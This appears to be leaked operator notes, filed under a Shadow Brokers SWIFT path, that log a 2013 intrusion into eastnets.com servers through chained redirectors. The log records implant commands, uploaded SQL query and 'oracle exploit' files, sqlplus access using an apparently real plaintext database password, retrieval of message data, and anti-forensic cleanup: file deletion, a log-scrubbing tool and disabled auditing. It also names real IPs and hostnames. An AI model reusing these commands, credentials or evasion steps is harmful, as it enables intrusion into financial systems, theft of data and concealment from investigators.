shadowbrokers-exploits/swift/DSL2opnotes.txt
2017-04-14 11:45:07 +02:00


ISP: LK
City:
Phone:
ISP IP: 89.185.234.145
Source IP:
FINAL target IP:
Ops Machine: LOCALHOST.LOCALDOMAIN
Redirecting Method 1: PITCHIMPAIR
Redirect Host 1: 133.94.1.3
Redirect Target 1: 192.168.208.11
Redirecting Method 2: INCISION
Redirect Host 2: 192.168.208.11
Redirect Target 2: 192.168.200.52
Redirecting Method 3: INCISION
Redirect Host 3: 192.168.208.11
Redirect Target 3: 192.168.200.86
BEGIN UNIX OPNOTES:
Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
--> 133.94.1.3 cis.cc.kurume-it.ac.jp pitchimpair unix successful
---> 192.168.208.11 ensbdmgmt2.eastnets.com jeepflea_market windows successful
----> 192.168.200.52 ensbdsl2.eastnets.com jeepflea_market windows successful
----> 192.168.200.86 ensbdnisl1.eastnets.com jeepflea_market windows successful
Ops Machine: WO
Results:
PROJECT=JEEPFLEA_MARKET
OPUSER=37322
OPSCHEDULE=13050914490339
SCRUBVER=6.006000037
======================= P0
--- 133.94.1.3 --- cis
=======================
ourtn -eY5U /current/up/noserver -wBIN 133.94.1.3
2013-05-14 12:35:13 UTC -- on target
9:35pm up 33 day(s), 22:52, 0 users, load average: 0.00, 0.00, 0.00
User tty login@ idle JCPU PCPU what
Tue May 14 21:35:30 JST 2013
Tue May 14 12:35:30 GMT 2013
SunOS cis 5.10 Generic_142900-09 sun4u sparc SUNW,Sun-Fire-V250
-tunnel
r 44378 192.168.254.72 44378
2013-05-14 16:36:01 UTC -- burn
LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000037 20130514-1225
###################
SCRUBHANDS v6.006000037 (suite v6.6.0.37 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 13050914490339 -I 37322 -P JEEPFLEA_MARKET -n 8.8.8.8 89.185.234.145/240/158
###################
Final lines of bwmonitor.txt:
Tue May 14 16:38:39 UTC 2013
eth0 bytes (MB) packets kbps (kBps) kbps-1m kbps-10m kbps-hr
TX 10790208 (10.3) 33780 0.0 (0.0) 0.0 0.1 3.2
RX 20340406 (19.4) 35347 0.0 (0.0) 0.1 0.3 4.2
###################################################
PROJECT: JEEPFLEA_MARKET
DATE: 12:31 PM 05/14/2013
OPUSER: 37322
OPSCHEDULE: 13050914490339
#Op Status: Unsuccessful
#Non-Standard: True
###################################################
Targets:
Results:
#z0.0.0.11 = 192.168.208.11
#z0.0.0.12,z0.0.0.13 = 192.168.200.52
#z0.0.0.14,z0.0.0.15,z0.0.0.16 = 192.168.200.86
======================= T1
--- 192.168.208.11 --- ENSBDMGMT2
=======================
Win2k8 64bit R2
UR callback 44378
1:03 PM 5/14/2013 -- on target
Uptime:88 days, 14:46:22
Auditing:[2013-05-14 13:01:44 z0.0.0.11] Security auditing dorked, do not stop command 275 or you will lose your blessing
PSP:
12972 | 11452 | ------C:\Windows\system32\telnet.exe
dir -mask * -path c:\ -age 1h -recursive
prettych
quitanddelete
monitor packetredirect -listenport 3333 -raw
redirect -tcp -implantlisten 4426 -target 127.0.0.1 4426
4:26 PM 5/14/2013 -- BURNED
======================= T2
--- 192.168.200.52 --- ENSBDSL2
=======================
Win2k8 64 bit R2
1:25 PM 5/14/2013 PC2 target : 192.168.200.52
source : 192.168.200.11
final : 192.168.200.52
cb : 4378, 192.168.200.11
id : 0x100011b3c
key : jeepflea_market
ICMP : ICMP 8,0
Uptime:4 days, 16:6:5
Auditing:2013-05-14 13:30:17 z0.0.0.12] Security auditing dorked, do not stop command 798 or you will lose your blessing
PSP: Symantec Endpoint Protection 11
| 3756 | 560 | ------D:\Double-Take\DoubleTake.exe
grep -mask SPFILEACCESS.ORA -path D:\Alliance\Access\Database\database -pattern audit -nocase
cd c:\$Recycle.bin
put D:\DSZOPSDisk\Preps\swift_msg_queries_all.1368533247.sql -name C:\$Recycle.Bin\S-1-5-~1\$ICD12FA.txt
run -command "cmd.exe /q" -redirect
D:\alliance\access\database\bin\sqlplus.exe saauser/Aetq9f7CQtljCHtAmstCGF64C
1:59 PM 5/14/2013 -- disconnected when running the command
1:59 PM 5/14/2013 -- retriggered back on, checking logs
SQL>@$ICD12FA.txt
output file:$ICD12FB.txt
start:20130424
end:20130514
2:16 PM 5/14/2013 -- getting file
2:20 PM 5/14/2013 -- clean up
delete $ICD12FA.txt
delete $ICD12FB.txt
monitor packetredirect -listenport 3333 -raw
redirect -tcp -implantlisten 42316 -target 127.0.0.1 42316
dir -mask * -path c:\ -age 30m -recursive
prettych
quitanddelete
4:06 PM 5/14/2013 -- BURNED
======================= T2
--- 192.168.200.86 --- ENSBDNISL1
=======================
Win2k8 64 bit R2
2:31 PM 5/14/2013 PC2 target : 192.168.200.86
source : 192.168.200.11
final : 192.168.200.86
cb : 4639, 192.168.200.11
id : 0x1000125ae
key : jeepflea_market
ICMP : ICMP 8,0
Uptime:4 days, 16:7:18
Auditing:2013-05-14 14:37:03 z0.0.0.14] Security auditing dorked, do not stop command 1601 or you will lose your blessing
PSP: Symantec Endpoint Protection 11
grep -mask SPFILEACCESS.ORA -path D:\Alliance\Access\Database\database\ -pattern audit -nocase
3:03 PM 5/14/2013 -- EMAGENT.EXE not running, grep returned nothing
cd C:\$Recycle.Bin\S-1-5-~1
put D:\DSZOPSDisk\Preps\initial_oracle_exploit.1368537345.sql -name $ICD12FA.txt
lsnrctl status
3:31 PM 5/14/2013 -- looking for listener
LSNRCTL for 64-bit Windows: Version 11.2.0.1.0 - Production on 14-MAY-2013 19:29:17
Copyright (c) 1991, 2010, Oracle. All rights reserved.
Connecting to (ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
64-bit Windows Error: 61: Unknown error
run -command "cmd.exe /q" -redirect
D:\alliance\access\database\bin\sqlplus.exe / as SYSDBA
3:19 PM 5/14/2013 -- failed to connect
SQL>@swift_msg_queries_all.sql
ERROR:
ORA-12560: TNS:protocol adapter error
dir -mask * -path c:\ -age 3h -recursive
prettych
eventlogsurvey
quitanddelete
4:08 PM 5/14/2013 -- BURNED